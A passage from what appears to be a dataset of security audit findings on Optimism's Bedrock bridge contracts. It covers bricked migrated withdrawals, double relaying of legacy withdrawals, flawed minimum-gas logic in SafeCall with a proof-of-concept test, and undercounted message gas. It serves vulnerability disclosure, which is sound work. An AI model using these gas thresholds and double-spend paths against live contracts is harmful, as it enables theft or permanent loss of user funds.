withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs we can see, the `relayMessage()` call uses a gasLimit of zero (see comments above), while the outer gas limit is calculated by the `MigrateWithdrawalGasLimit()` function:\\n```\\nfunc MigrateWithdrawalGasLimit(data []byte) uint64 {\\n // Compute the cost of the calldata\\n dataCost := uint64(0)\\n for _, b := range data {\\n if b == 0 {\\n dataCost += params.TxDataZeroGas\\n } else {\\n dataCost += params.TxDataNonZeroGasEIP2028\\n }\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := dataCost + 200_000\\n // Cap the gas limit to be 25 million to prevent creating withdrawals\\n // that go over the block gas limit.\\n if gasLimit > 25_000_000 {\\n gasLimit = 25_000_000\\n }\\n\\n return gasLimit\\n}\\n```\\n\\nThis calculates the outer gas limit value by adding the calldata cost to 200,000.\\nLet's move over to the scenario in which these values are used to see why they can cause a problem.\\nWhen a transaction is proven, we can call `OptimismPortal.finalizeWithdrawalTransaction()` to execute the transaction. In the case of migrated withdrawals, this executes the following flow:\\n`OptimismPortal` calls to `L1CrossDomainMessenger` with a gas limit of `200,000 + calldata`\\nThis guarantees remaining gas for continued execution after the call of `(200_000 + calldata) * 64/63 * 1/64 > 3174`\\nXDM uses `41,002` gas before making the call, leaving `158,998` remaining for the call\\nThe `SafeCall.callWithMinGas()` succeeds, since the inner gas limit is set to 0\\nIf the call uses up all of the avaialble gas (succeeding or reverting), we are left with `158,998` * 1/64 = 2,484 for the remaining execution\\nThe remaining execution includes multiple SSTOREs which totals `23,823` gas, resulting in an OutOfGas revert\\nIn fact, if the call uses any amount greater than `135,175`, we will have less than `23,823` gas remaining and will revert\\nAs a result, none of the updates to `L1CrossDomainMessenger` occur, and the transaction is not marked in `failedMessages` for replayability\\nHowever, the remaining `3174` gas is sufficient to complete the transction on the `OptimismPortal`, which sets `finalizedWithdrawals[hash] = true` and locks the withdrawals from ever being made againчThere doesn't seem to be an easy fix for this, except to adjust the migration process so that migrated withdrawals are directly saved as `failedMessages` on the `L1CrossDomainMessenger` (and marked as `finalizedWithdrawals` on the OptimismPortal), rather than needing to be reproven through the normal flow.чAny migrated withdrawal that uses more than `135,175` gas will be bricked if insufficient gas is sent. This could be done by a malicious attacker bricking thousands of pending withdrawals or, more likely, could happen to users who accidentally executed their withdrawal with too little gas and ended up losing it permanently.ч```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot migrate withdrawal: %w\", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n \"relayMessage\",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(\"cannot abi encode relayMessage: %w\", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n -Legacy withdrawals can be relayed twice, causing double spending of bridged assetsчhighч`L2CrossDomainMessenger.relayMessage` checks that legacy messages have not been relayed by reading from the `successfulMessages` state variable, however the contract's storage will wiped during the migration to Bedrock and `successfulMessages` will be empty after the deployment of the contract. The check will always pass, even if a legacy message have already been relayed using its v0 hash. As a result, random withdrawal messages, as well as messages from malicious actors, can be relayed multiple times during the migration: first, as legacy v0 messages (before the migration); then, as Bedrock v1 messages (during the migration).\\nL2CrossDomainMessenger inherits from CrossDomainMessenger, which inherits from `CrossDomainMessengerLegacySpacer0`, `CrossDomainMessengerLegacySpacer1`, assuming that the contract will be deployed at an address with existing state-the two spacer contracts are needed to \"skip\" the slots occupied by previous implementations of the contract.\\nDuring the migration, legacy (i.e. pre-Bedrock) withdrawal messages will be converted to Bedrock messages-they're expected to call the `relayMessage` function of `L2CrossDomainMessenger`. The `L2CrossDomainMessenger.relayMessage` function checks that the relayed legacy message haven't been relayed already:\\n```\\n// If the message is version 0, then it's a migrated legacy withdrawal. We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n \"CrossDomainMessenger: legacy withdrawal already relayed\"\\n );\\n}\\n```\\n\\nIt reads a V0 message hash from the `successfulMessages` state variable, assuming that the content of the variable is preserved during the migration. However, the state and storage of all predeployed contracts is wiped during the migration:\\n```\\n// We need to wipe the storage of every predeployed contract EXCEPT for the GovernanceToken,\\n// WETH9, the DeployerWhitelist, the LegacyMessagePasser, and LegacyERC20ETH. We have verified\\n// that none of the legacy storage (other than the aforementioned contracts) is accessible and\\n// therefore can be safely removed from the database. Storage must be wiped before anything\\n// else or the ERC-1967 proxy storage slots will be removed.\\nif err := WipePredeployStorage(db); err != nil {\\n return nil, fmt.Errorf(\"cannot wipe storage: %w\", err)\\n}\\n```\\n\\nAlso notice that withdrawals are migrated after predeploys were wiped and deployed-predeploys will have empty storage at the time withdrawals are migrated.\\nMoreover, if we check the code at the `L2CrossDomainMessenger` address of the current version of Optimism, we'll see that the contract's storage layout is different from the layout of the `CrossDomainMessengerLegacySpacer0` and `CrossDomainMessengerLegacySpacer1` contracts: there are no gaps and other spacer slots; `successfulMessages` is the second slot of the contract. Thus, even if there were no wiping, the `successfulMessages` mapping of the new `L2CrossDomainMessenger` contract would still be empty.чConsider cleaning up the storage layout of `L1CrossDomainMessenger`, `L2CrossDomainMessenger` and other proxied contracts.\\nIn the PreCheckWithdrawals function, consider reading withdrawal hashes from the `successfulMessages` mapping of the old `L2CrossDomainMessenger` contract and checking if the values are set. Successful withdrawals should be skipped at this point to filter out legacy withdrawals that have already been relayed.\\nConsider removing the check from the `relayMessage` function, since the check will be useless due to the empty state of the contract.чWithdrawal messages can be relayed twice: once right before and once during the migration. ETH and ERC20 tokens can be withdrawn twice, which is basically double spending of bridged assets.ч```\\n// If the message is version 0, then it's a migrated legacy withdrawal. We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n \"CrossDomainMessenger: legacy withdrawal already relayed\"\\n );\\n}\\n```\\n -The formula used in ````SafeCall.callWithMinGas()```` is wrongчhighчThe formula used in `SafeCall.callWithMinGas()` is not fully complying with EIP-150 and EIP-2929, the actual gas received by the sub-contract can be less than the required `_minGas`. Withdrawal transactions can be finalized with less than specified gas limit, may lead to loss of funds.\\n```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: \"If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the \"Error(string)\" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(\"SafeCall: Not enough gas\")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n\\nThe current formula used in `SafeCall.callWithMinGas()` involves two issues.\\nFirstly, the `63/64` rule is not the whole story of EIP-150 for the `CALL` opcode, let's take a look at the implementation of EIP-150, a `base` gas is subtracted before applying `63/64` rule.\\n```\\nfunc callGas(isEip150 bool, availableGas, base uint64, callCost *uint256.Int) (uint64, error) {\\n if isEip150 {\\n availableGas = availableGas - base\\n gas := availableGas - availableGas/64\\n // If the bit length exceeds 64 bit we know that the newly calculated \"gas\" for EIP150\\n // is smaller than the requested amount. Therefore we return the new gas instead\\n // of returning an error.\\n if !callCost.IsUint64() || gas < callCost.Uint64() {\\n return gas, nil\\n }\\n }\\n if !callCost.IsUint64() {\\n return 0, ErrGasUintOverflow\\n }\\n\\n return callCost.Uint64(), nil\\n}\\n```\\n\\nThe `base` gas is calculated in `gasCall()` of `gas_table.go`, which is subject to\\n```\\n(1) L370~L376: call to a new account\\n(2) L377~L379: call with non zero value\\n(3) L380~L383: memory expansion\\n```\\n\\nThe `(1)` and `(3)` are irrelevant in this case, but `(2)` should be taken into account.\\n```\\nFile: core\\vm\\gas_table.go\\nfunc gasCall(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n var (\\n gas uint64\\n transfersValue = !stack.Back(2).IsZero()\\n address = common.Address(stack.Back(1).Bytes20())\\n )\\n if evm.chainRules.IsEIP158 {\\n if transfersValue && evm.StateDB.Empty(address) {\\n gas += params.CallNewAccountGas\\n }\\n } else if !evm.StateDB.Exist(address) {\\n gas += params.CallNewAccountGas\\n }\\n if transfersValue {\\n gas += params.CallValueTransferGas\\n }\\n memoryGas, err := memoryGasCost(mem, memorySize)\\n if err != nil {\\n return 0, err\\n }\\n var overflow bool\\n if gas, overflow = math.SafeAdd(gas, memoryGas); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n\\n evm.callGasTemp, err = callGas(evm.chainRules.IsEIP150, contract.Gas, gas, stack.Back(0))\\n if err != nil {\\n return 0, err\\n }\\n if gas, overflow = math.SafeAdd(gas, evm.callGasTemp); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n return gas, nil\\n}\\n```\\n\\nThe `raw` extra gas for transferring value is\\n```\\nparams.CallValueTransferGas - params.CallStipend * 64 / 63 = 9000 - 2300 * 64 / 63 = 6664\\n```\\n\\nSecondly, EIP-2929 also affects the gas cost of `CALL` opcode.\\n```\\nFile: core\\vm\\operations_acl.go\\n gasCallEIP2929 = makeCallVariantGasCallEIP2929(gasCall)\\n\\nFile: core\\vm\\operations_acl.go\\nfunc makeCallVariantGasCallEIP2929(oldCalculator gasFunc) gasFunc {\\n return func(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n addr := common.Address(stack.Back(1).Bytes20())\\n // Check slot presence in the access list\\n warmAccess := evm.StateDB.AddressInAccessList(addr)\\n // The WarmStorageReadCostEIP2929 (100) is already deducted in the form of a constant cost, so\\n // the cost to charge for cold access, if any, is Cold - Warm\\n coldCost := params.ColdAccountAccessCostEIP2929 - params.WarmStorageReadCostEIP2929\\n if !warmAccess {\\n evm.StateDB.AddAddressToAccessList(addr)\\n // Charge the remaining difference here already, to correctly calculate available\\n // gas for call\\n if !contract.UseGas(coldCost) {\\n return 0, ErrOutOfGas\\n }\\n }\\n // Now call the old calculator, which takes into account\\n // - create new account\\n // - transfer value\\n // - memory expansion\\n // - 63/64ths rule\\n gas, err := oldCalculator(evm, contract, stack, mem, memorySize)\\n if warmAccess || err != nil {\\n return gas, err\\n }\\n // In case of a cold access, we temporarily add the cold charge back, and also\\n // add it to the returned gas. By adding it to the return, it will be charged\\n // outside of this function, as part of the dynamic gas, and that will make it\\n // also become correctly reported to tracers.\\n contract.Gas += coldCost\\n return gas + coldCost, nil\\n }\\n}\\n```\\n\\nHere is a test script to show the impact of the two aspects mentioned above\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.15;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"forge-std/console.sol\";\\n\\nlibrary SafeCall {\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n uint256 gasSent;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: \"If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the \"Error(string)\" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(\\n 88,\\n 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173\\n )\\n\\n // Revert with 'Error(\"SafeCall: Not enough gas\")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n gasSent := gas() // @audit this operation costs 2 gas\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n console.log(\"gasSent =\", gasSent);\\n return _success;\\n }\\n}\\n\\ncontract Callee {\\n fallback() external payable {\\n uint256 gas = gasleft();\\n console.log(\"gasReceived =\", gas);\\n }\\n}\\n\\ncontract Caller {\\n function execute(\\n address _target,\\n uint256 _minGas,\\n bytes memory _calldata\\n ) external payable {\\n SafeCall.callWithMinGas(_target, _minGas, msg.value, _calldata);\\n }\\n}\\n\\ncontract TestCallWithMinGas is Test {\\n address callee;\\n Caller caller;\\n\\n function setUp() public {\\n callee = address(new Callee());\\n caller = new Caller();\\n }\\n\\n function testCallWithMinGas() public {\\n console.log(\"-------1st call------\");\\n caller.execute{gas: 64_855}(callee, 63_000, \"\");\\n\\n console.log(\"\\n -------2nd call------\");\\n caller.execute{gas: 64_855}(callee, 63_000, \"\");\\n\\n console.log(\"\\n -------3rd call------\");\\n caller.execute{gas: 62_555, value: 1}(callee, 63_000, \"\");\\n }\\n}\\n```\\n\\nAnd the log would be\\n```\\nRunning 1 test for test/TestCallWithMinGas.sol:TestCallWithMinGas\\n[PASS] testCallWithMinGas() (gas: 36065)\\nLogs:\\n -------1st call------\\n gasReceived = 60582\\n gasSent = 64200\\n\\n -------2nd call------\\n gasReceived = 63042\\n gasSent = 64200\\n\\n -------3rd call------\\n gasReceived = 56483\\n gasSent = 64200\\n```\\n\\nThe difference between `1st call` and `2nd call` is caused by EIP-2929, and the difference between `2nd call` and `3rd call` is caused by transferring value. We can see the actual received gas in the sub-contract is less than the 63,000 `_minGas` limit in both 1st and `3rd call`.чThe migration logic may look like\\n```\\nif (_value == 0) {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600\\n} else {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600 + 6700\\n}\\n```\\nч`SafeCall.callWithMinGas()` is a key design to ensure withdrawal transactions will be executed with more gas than the limit specified by users. This issue breaks the specification. Finalizing withdrawal transactions with less than specified gas limit may fail unexpectedly due to out of gas, lead to loss of funds.ч```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: \"If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the \"Error(string)\" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(\"SafeCall: Not enough gas\")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n -CrossDomainMessenger does not successfully guarantee replayability, can lose user fundsчmediumчWhile `SafeCall.callWithMinGas` successfully ensures that the called function will not revert, it does not ensure any remaining buffer for continued execution on the calling contract.\\nAs a result, there are situations where `OptimismPortal` can be called with an amount of gas such that the remaining gas after calling `L1CrossDomainMessenger` is sufficient to finalize the transaction, but such that the remaining gas after `L1CrossDomainMessenger` makes its call to target is insufficient to mark the transaction as successful or failed.\\nIn any of these valid scenarios, users who withdraw using the L1CrossDomainMessenger (expecting replayability) will have their withdrawals bricked, permanently losing their funds.\\nWhen a user performs a withdrawal with the `L1CrossDomainMessenger`, they include a `gasLimit` value, which specifies the amount of gas that is needed for the function to execute on L1.\\nThis value is translated into two separate values:\\nThe `OptimismPortal` sends at least baseGas(_message, _minGasLimit) = 64/63 * `_minGasLimit` + 16 * data.length + 200_000 to `L1CrossDomainMessenger`, which accounts for the additional overhead used by the Cross Domain Messenger.\\nThe `L1CrossDomainMessenger` sends at least `_minGasLimit` to the target contract.\\nThe core of this vulnerability is in the fact that, if:\\n`OptimismPortal` retains sufficient gas after its call to complete the transaction, and\\n`L1CrossDomainMessenger` runs out of gas after its transaction is complete (even if the tx succeeded)\\n...then the result will be that the transaction is marked as finalized in the Portal (disallowing it from being called again), while the Cross Domain Messenger transaction will revert, causing the target transaction to revert and not setting it in `failedMessages` (disallowing it from being replayed). The result is that the transaction will be permanently stuck.\\nCalcuations\\nLet's run through the math to see how this might unfold. We will put aside the additional gas allocated for calldata length, because this amount is used up in the call and doesn't materially impact the calculations.\\nWhen the `OptimismPortal` calls the `L1CrossDomainMessenger`, it is enforced that the gas sent will be greater than or equal to `_minGasLimit * 64/63 + 200_000`.\\nThis ensures that the remaining gas for the `OptimismPortal` to continue execution after the call is at least `_minGasLimit / 64 + 3125`. Even assuming that `_minGasLimit == 0`, this is sufficient for `OptimismPortal` to complete execution, so we can safely say that any time `OptimismPortal.finalizeWithdrawalTransaction()` is called with sufficient gas to pass the `SafeCall.callWithMinGas()` check, it will complete execution.\\nMoving over to `L1CrossDomainMessenger`, our call begins with at least `_minGasLimit * 64/63 + 200_000` gas. By the time we get to the external call, we have remaining gas of at least `_minGasLimit * 64/63 + 158_998`. This leaves us with the following guarantees:\\nGas available for the external call will be at least 63/64ths of that, which equals `_minGasLimit + 156_513`.\\nGas available for continued execution after the call will be at least 1/64th of that, which equals `_minGasLimit * 1/63 + 3125`.\\nThe additional gas required to mark the transaction as `failedMessages[versionedHash] = true` and complete the rest of the execution is `23,823`.\\nTherefore, in any situation where the external call uses all the available gas will revert if `_minGasLimit * 1/63 + 3125 < 23_823`, which simplifies to `_minGasLimit < 1_303_974`. In other words, in most cases.\\nHowever, it should be unusual for the external call to use all the available gas. In most cases, it should only use `_minGasLimit`, which would leave `156_513` available to resolve this issue.\\nSo, let's look at some examples of times when this may not be the case.\\nAt Risk Scenarios\\nThere are several valid scenarios where users might encounter this issue, and have their replayable transactions stuck:\\nUser Sends Too Little Gas\\nThe expectation when using the Cross Domain Messenger is that all transactions will be replayable. Even if the `_minGasLimit` is set incorrectly, there will always be the opportunity to correct this by replaying it yourself with a higher gas limit. In fact, it is a core tenet of the Cross Domain Messengers that they include replay protection for failed transactions.\\nHowever, if a user sets a gas limit that is too low for a transaction, this issue may result.\\nThe consequence is that, while users think that Cross Domain Messenger transactions are replayable and gas limits don't need to be set precisely, they can in fact lose their entire withdrawal if they set their gas limit too low, even when using the \"safe\" Standard Bridge or Cross Domain Messenger.\\nTarget Contract Uses More Than Minimum Gas\\nThe checks involved in this process ensure that sufficient gas is being sent to a contract, but there is no requirement that that is all the gas a contract uses.\\n`_minGasLimit` should be set sufficiently high for the contract to not revert, but that doesn't mean that `_minGasLimit` represents the total amount of gas the contract uses.\\nAs a silly example, let's look at a modified version of the `gas()` function in your `Burn.sol` contract:\\n```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n\\nThis function runs until it leaves a specified amount of gas, and then returns. While the amount of gas sent to this contract could comfortably exceed the `_minGasLimit`, it would not be safe to assume that the amount leftover afterwards would equal `startingGas - _minGasLimit`.\\nWhile this is a contrived example, but the point is that there are many situations where it is not safe to assume that the minimum amount of gas a function needs will be greater than the amount it ends up using, if it is provided with extra gas.\\nIn these cases, the assumption that our leftover gas after the function runs will be greater than the required 1/64th does not hold, and the withdrawal can be bricked.ч`L1CrossDomainMessenger` should only send `_minGasLimit` along with its call to the target (rather than gas()) to ensure it has sufficient leftover gas to ensure replayability.чIn certain valid scenarios where users decide to use the \"safe\" Cross Domain Messenger or Standard Bridge with the expectation of replayability, their withdrawals from L2 to L1 can be bricked and permanently lost.ч```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n -Gas usage of cross-chain messages is undercounted, causing discrepancy between L1 and L2 and impacting intrinsic gas calculationчmediumчGas consumption of messages sent via CrossDomainMessenger (including both L1CrossDomainMessenger and L2CrossDomainMessenger) is calculated incorrectly: the gas usage of the \"relayMessage\" wrapper is not counted. As a result, the actual gas consumption of sending a message will be higher than expected. Users will pay less for gas on L1, and L2 blocks may be filled earlier than expected. This will also affect gas metering via ResourceMetering: metered gas will be lower than actual consumed gas, and the EIP-1559-like gas pricing mechanism won't reflect the actual demand for gas.\\nThe CrossDomainMessenger.sendMessage function is used to send cross-chain messages. Users are required to set the `_minGasLimit` argument, which is the expected amount of gas that the message will consume on the other chain. The function also computes the amount of gas required to pass the message to the other chain: this is done in the `baseGas` function, which computes the byte-wise cost of the message. `CrossDomainMessenger` also allows users to replay their messages on the destination chain if they failed: to allow this, the contract wraps user messages in `relayMessage` calls. This increases the size of messages, but the `baseGas` call above counts gas usage of only the original, not wrapped in the `relayMessage` call, message.\\nThis contradicts the intrinsic gas calculation in `op-geth`, which calculates gas of an entire message data:\\n```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n\\nThus, there's a discrepancy between the contract and the node, which will result in the node consuming more gas than users paid for.\\nThis behaviour also disagrees with how the migration process works:\\nwhen migrating pre-Bedrock withdrawals, `data` is the entire messages, including the `relayMessage` calldata;\\nthe gas limit of migrated messages is computed on the entire `data`.\\nTaking into account the logic of paying cross-chain messages' gas consumption on L1, I think the implementation in the migration code is correct and the implementation in `CrossDomainMessenger` is wrong: users should pay for sending the entire cross-chain message, not just the calldata that will be execute on the recipient on the other chain.чWhen counting gas limit in the `CrossDomainMessenger.sendMessage` function, consider counting the entire message, including the `relayMessage` calldata wrapping. Consider a change like that:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\nindex f67021010..5239feefd 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n@@ // Remove the line below\\n253,19 // Add the line below\\n253,20 @@ abstract contract CrossDomainMessenger is\\n // message is the amount of gas requested by the user PLUS the base gas value. We want to\\n // guarantee the property that the call to the target contract will always have at least\\n // the minimum gas limit specified by the user.\\n// Add the line below\\n bytes memory wrappedMessage = abi.encodeWithSelector(\\n// Add the line below\\n this.relayMessage.selector,\\n// Add the line below\\n messageNonce(),\\n// Add the line below\\n msg.sender,\\n// Add the line below\\n _target,\\n// Add the line below\\n msg.value,\\n// Add the line below\\n _minGasLimit,\\n// Add the line below\\n _message\\n// Add the line below\\n );\\n _sendMessage(\\n OTHER_MESSENGER,\\n// Remove the line below\\n baseGas(_message, _minGasLimit),\\n// Add the line below\\n baseGas(wrappedMessage, _minGasLimit),\\n msg.value,\\n// Remove the line below\\n abi.encodeWithSelector(\\n// Remove the line below\\n this.relayMessage.selector,\\n// Remove the line below\\n messageNonce(),\\n// Remove the line below\\n msg.sender,\\n// Remove the line below\\n _target,\\n// Remove the line below\\n msg.value,\\n// Remove the line below\\n _minGasLimit,\\n// Remove the line below\\n _message\\n// Remove the line below\\n )\\n// Add the line below\\n wrappedMessage\\n );\\n\\n emit SentMessage(_target, msg.sender, _message, messageNonce(), _minGasLimit);\\n```\\nчSince the `CrossDomainMessenger` contract is recommended to be used as the main cross-chain messaging contract and since it's used by both L1 and L2 bridges (when bridging ETH or ERC20 tokens), the undercounted gas will have a 